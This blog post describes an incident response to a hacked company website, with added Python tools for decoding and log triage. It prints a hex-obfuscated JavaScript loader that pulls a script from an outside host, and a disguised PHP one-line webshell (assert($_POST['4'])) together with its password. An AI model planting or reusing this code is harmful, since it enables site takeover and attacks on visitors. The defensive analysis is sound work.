
The company website got a Trojan planted on it: a self-check method

Website tips · barben · 2 years ago (April 20, 2019) · 661 views · 0 comments

Yesterday the manager came by again and said the company's website had been compromised: someone had planted a Trojan on it.

Since I don't know how to do penetration testing, all I could do was feel my way through it blindly.

What was in the home page file? The three main tags were there as normal (screenshot omitted).

There was also a block of JS code. I copied it into Baidu and found that this code shows up on basically every compromised site, but I had no idea what it actually did:

 <script type="text/javascript">
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"] ('\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22  \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x66\x73\x66\x64\x73\x66\x2e\x6f\x73\x73\x2d\x63\x6e\x2d\x68\x6f\x6e\x67\x6b\x6f\x6e\x67\x2e\x61\x6c\x69\x79\x75\x6e\x63\x73\x2e\x63\x6f\x6d\x2f\x31\x39\x30\x30\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');
</script>

These are hexadecimal escapes (\xHH) for ordinary characters, so a JS engine reads them as plain text. Decoded, the call is window["document"]["write"](...), that is, document.write of a <script> tag whose src is https://sfsfdsf.oss-cn-hongkong.aliyuncs.com/1900.js. Whatever that remote file on the OSS bucket returns is written straight into the page; at a careless glance nothing looks wrong, which is the whole point of the encoding.
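As an added example (this is not code from the original post), here is a small Python decoder for snippets like the one above. It resolves the \xHH and \uHHHH escapes the way a JS engine does when parsing a string literal, without executing anything, rewrites window["document"]["write"] into dotted form so the sink name can be grepped, and pulls the src out of any <script> tag the decoded payload writes. The sample input is the snippet quoted above; the function and variable names are my own.

```python
import re

# Constructed sample: the obfuscated snippet quoted in the post above, with
# the surrounding <script> wrapper dropped. Every \xHH below is literal text
# (raw strings), exactly as it sits in the compromised page.
OBFUSCATED = (
    r'window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"] '
    r"('\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74"
    r"\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22  \x73\x72\x63\x3d\x22"
    r"\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x66\x73\x66\x64\x73\x66\x2e\x6f\x73"
    r"\x73\x2d\x63\x6e\x2d\x68\x6f\x6e\x67\x6b\x6f\x6e\x67\x2e\x61\x6c\x69\x79"
    r"\x75\x6e\x63\x73\x2e\x63\x6f\x6d\x2f\x31\x39\x30\x30\x2e\x6a\x73\x22\x3e"
    r"\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');"
)

# \xHH and \uHHHH escapes as a JS engine resolves them inside a string literal.
_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})")
# window["document"]["write"] -> window.document.write
_BRACKET = re.compile(r'\[\s*["\']([A-Za-z_$][\w$]*)["\']\s*\]')
# src="..." of any <script> tag in the decoded payload
_SCRIPT_SRC = re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)

# Sinks that turn a string into page content or code; one of these fed by an
# obfuscated string is the tell.
SINKS = ("document.write", "document.writeln", "eval(", "Function(", "innerHTML")


def decode_js_escapes(text: str) -> str:
    """Resolve \\xHH and \\uHHHH escapes with a regex; nothing is executed."""
    return _ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def normalize_member_access(js: str) -> str:
    """Rewrite obj["name"] as obj.name so sink names become greppable."""
    return _BRACKET.sub(r".\1", js)


def triage(snippet: str) -> dict:
    """Decode an obfuscated inline script and report what it does."""
    decoded = normalize_member_access(decode_js_escapes(snippet))
    return {
        "decoded": decoded,
        "sinks": [s for s in SINKS if s in decoded],
        "sources": _SCRIPT_SRC.findall(decoded),
    }


if __name__ == "__main__":
    report = triage(OBFUSCATED)
    print(report["decoded"])
    print("sinks:", report["sinks"])
    print("injected scripts:", report["sources"])
```

Decoding with a regex instead of pasting the snippet into a browser console matters: the remote script is still live as far as you know, and running it on your own machine is exactly what the attacker wants every visitor to do.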

At the bottom of the page I found a whole bunch of links to PHP files.

Then I took a look at what these PHP files actually were.

It turns out these files are all identical; only the names differ. Looking at the PHP code again: it fetches the content at an address passed in to a user-defined function and outputs it, so each of these files serves up whatever the remote address returns.

So I went straight ahead and opened that address, but because the company's website had been compromised for so long, that address, unfortunately, was already a 404.

Checking through the logs

Now that I knew where the black links had been injected into the page, I had to check how the attacker got in.
First, the FTP password can't have been guessed: the FTP passwords for all of the company's websites are randomly generated and mix upper-case, lower-case and digits. (A strong password rules out guessing; it does not rule out a password stolen from a developer's machine or reused somewhere that leaked, which is worth keeping in mind when the logs come up empty.)
Then I downloaded all of the site's access logs, but the hack happened so long ago that I couldn't find anything from that time.
Next I wanted to check the operation log in the admin backend, but the backend was written by my predecessors at the company and isn't that complete; there is no operation log at all.
No way to get at the truth.
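The access logs are normally the step that gives the answer, so here, as an added example that is not from the original post, is a Python triage over Apache/Nginx combined-format access log lines. The log lines, the client addresses, the file names (dede_config.php, abc123.php) and the inventory of legitimate PHP endpoints are all constructed for the example. It flags every request for a .php file that is not in the site's known inventory, POSTs most of all, groups the hits by client, and reports the earliest one: that is the timestamp to search the rest of the logs around.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime

# Constructed sample log (Apache/Nginx "combined" format). The addresses are
# documentation ranges and the file names are invented for the example.
LOG_LINES = """\
203.0.113.7 - - [18/Apr/2019:03:12:41 +0800] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [18/Apr/2019:03:14:02 +0800] "POST /uploads/dede_config.php HTTP/1.1" 200 117 "-" "Mozilla/4.0"
198.51.100.23 - - [18/Apr/2019:03:14:09 +0800] "POST /uploads/dede_config.php HTTP/1.1" 200 2044 "-" "Mozilla/4.0"
203.0.113.7 - - [18/Apr/2019:03:15:30 +0800] "POST /contact.php HTTP/1.1" 302 0 "https://example.invalid/contact.php" "Mozilla/5.0"
198.51.100.23 - - [18/Apr/2019:03:16:55 +0800] "GET /abc123.php?u=http://example.invalid/x HTTP/1.1" 404 210 "-" "Mozilla/4.0"
203.0.113.7 - - [18/Apr/2019:03:17:01 +0800] "GET /css/site.css HTTP/1.1" 200 880 "-" "Mozilla/5.0"
"""

# PHP files the site is supposed to serve (hypothetical inventory; in practice
# build it from a clean copy of the site or the deployment repository).
KNOWN_PHP = {"/index.php", "/contact.php"}

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"


@dataclass
class Hit:
    ip: str
    time: datetime
    method: str
    path: str
    status: int
    reason: str


def parse_line(line: str):
    """Fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], TIME_FMT)
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec


def triage(lines, known_php=KNOWN_PHP):
    """Flag every request for a PHP file that is not in the site's inventory.

    A POST to an unknown PHP file is the strongest signal: a planted shell is
    driven almost entirely by POST requests, and a legitimate site has only a
    handful of real form endpoints, all of which belong in the inventory."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].lower().endswith(".php"):
            continue
        if rec["path"] in known_php:
            continue
        reason = ("POST to PHP file outside inventory" if rec["method"] == "POST"
                  else "request for PHP file outside inventory")
        hits.append(Hit(rec["ip"], rec["time"], rec["method"], rec["path"],
                        rec["status"], reason))
    return hits


def by_client(hits):
    """Group flagged paths by client address; the shell operator stands out."""
    grouped = defaultdict(list)
    for h in hits:
        grouped[h.ip].append(h.path)
    return dict(grouped)


def first_seen(hits):
    """Earliest flagged request: the time to search the rest of the logs around."""
    return min(h.time for h in hits) if hits else None


if __name__ == "__main__":
    hits = triage(LOG_LINES.splitlines())
    for h in hits:
        print(h.time.isoformat(), h.ip, h.method, h.path, h.status, "-", h.reason)
    print(by_client(hits))
    print("first seen:", first_seen(hits))
```

Two caveats a practitioner would add: the inventory has to come from a clean source (a fresh checkout, not the compromised docroot, which is what the scan below has to sort through), and a 404 on an unknown .php path is still worth keeping, since the attacker may have been probing for a shell that had already been cleaned up.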

What about SafeDog?

Since I don't have the skills to find it by hand, use software to find where the backdoors are.
Have a look at Website SafeDog: http://free.safedog.cn/website_safedog.html
(@SafeDog, please pay me the advertising fee)

I downloaded all of the website's files, ran a scan, and it turned up a whole pile of Trojans.

Because I once used a one-line Trojan (一句话木马) to play at a simple intrusion myself, I opened the second scan result at random, and sure enough, it was exactly that!!!

Opening the Trojan file: only two lines of real code are exposed in the whole file, and the rest is all commented-out code (it even goes so far as to disguise itself as a DedeCMS (织梦) file, which is quite something).

I copied these two lines into Baidu to see what they are:

 $a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]);
$b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]);

It really is a one-line Trojan. After looking it up on Baidu I learned that the Trojan's password is 4. The trick is simple once you see it: $a=range(1,200) makes $a[i] equal to i+1, so chr($a[96]) is chr(97), the letter a, and so on. The first line spells out the string assert, the second spells out $_POST and the key '4', so the two lines together are assert($_POST['4']), which runs whatever is posted in a parameter named 4 as PHP code. The commented-out DedeCMS code around it is only there so that a human skimming the file, or a naive signature scan, sees a normal-looking file.
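As an added example that is not part of the original post, here is a Python script that undoes that obfuscation statically: it resolves each chr($a[N]) from the range() it indexes, folds the string concatenations, inlines the variable function call, and then scans the result for a code-execution sink fed directly by a request parameter, which is the kind of indicator a webshell scanner looks for. Only the two lines quoted above are taken from the post; the function names and regexes are mine, and the rewriter handles just the simple patterns shown (it is not a general PHP parser).

```python
import re

# The two visible lines of the planted file, copied from the post above.
ONE_LINER = (
    "$a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100])"
    ".chr($a[113]).chr($a[115]);\n"
    "$b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]);"
)

RANGE_RE = re.compile(r"\$(\w+)\s*=\s*range\(\s*(-?\d+)\s*,\s*(-?\d+)\s*\)")
CHR_IDX_RE = re.compile(r"chr\(\s*\$(\w+)\[(\d+)\]\s*\)")
CONCAT_RE = re.compile(r"'([^']*)'\s*\.\s*'([^']*)'")
BRACE_VAR_RE = re.compile(r"\$\{\s*'(\w+)'\s*\}")
STR_ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'\s*;")
# Code-execution sinks called directly on a request parameter.
SINK_RE = re.compile(
    r"\b(eval|assert|system|passthru|shell_exec|exec|popen|create_function|preg_replace)"
    r"\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\[\s*['\"]?(\w+)['\"]?\s*\]"
)


def range_tables(src: str) -> dict:
    """Materialise every `$x = range(lo, hi)` (PHP range() is inclusive)."""
    return {name: list(range(int(lo), int(hi) + 1))
            for name, lo, hi in RANGE_RE.findall(src)}


def resolve_chr(src: str) -> str:
    """Replace chr($x[N]) by the character it stands for, as a quoted literal."""
    tables = range_tables(src)

    def repl(m):
        tab = tables.get(m.group(1))
        idx = int(m.group(2))
        if tab is None or idx >= len(tab):
            return m.group(0)  # unknown table or out-of-range index: leave it
        return "'" + chr(tab[idx]) + "'"

    return CHR_IDX_RE.sub(repl, src)


def fold_concat(src: str) -> str:
    """Collapse 'a'.'b'.'c' into 'abc', repeating until nothing changes."""
    prev = None
    while prev != src:
        prev = src
        src = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", src)
    return src


def inline_string_vars(src: str) -> str:
    """${'_POST'} -> $_POST, and $b(...) -> assert(...) when $b = 'assert'."""
    src = BRACE_VAR_RE.sub(r"$\1", src)
    for name, value in STR_ASSIGN_RE.findall(src):
        src = re.sub(r"\$" + re.escape(name) + r"\s*\(", value + "(", src)
    return src


def deobfuscate(src: str) -> str:
    return inline_string_vars(fold_concat(resolve_chr(src)))


def analyze(src: str) -> dict:
    """Deobfuscate and list the (sink, superglobal, parameter) triples found."""
    clean = deobfuscate(src)
    return {"deobfuscated": clean, "sinks": SINK_RE.findall(clean)}


if __name__ == "__main__":
    result = analyze(ONE_LINER)
    print(result["deobfuscated"])
    for sink, glob, param in result["sinks"]:
        print(f"{sink}() executes $_{glob}['{param}'] -> shell password is '{param}'")
```

The point of rewriting rather than grepping is that a plain signature such as eval($_POST never appears in the file; the only literal strings in it are the DedeCMS comments. Scanning for the pattern that survives the rewrite, a sink whose argument is a request superglobal, is what catches this family regardless of which index trick was used.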

Well, now that I know it's a one-liner, let's try it with the tool I played with back in the day, the legendary China Chopper (中国菜刀).

Sure enough, I got full control of the website.

To be continued

There's far too much to say about penetration. The most important thing is still to secure the website properly: delete any security holes and Trojan files you find promptly, and don't give the bad guys an opening!!!
As for the vulnerability in the company's website, emmmmm… still looking~


Unless marked as a repost, articles here are original; please cite this article's link and source when reposting:
The company website got a Trojan planted on it: a self-check method - https://www.barben.cn/skill/435.html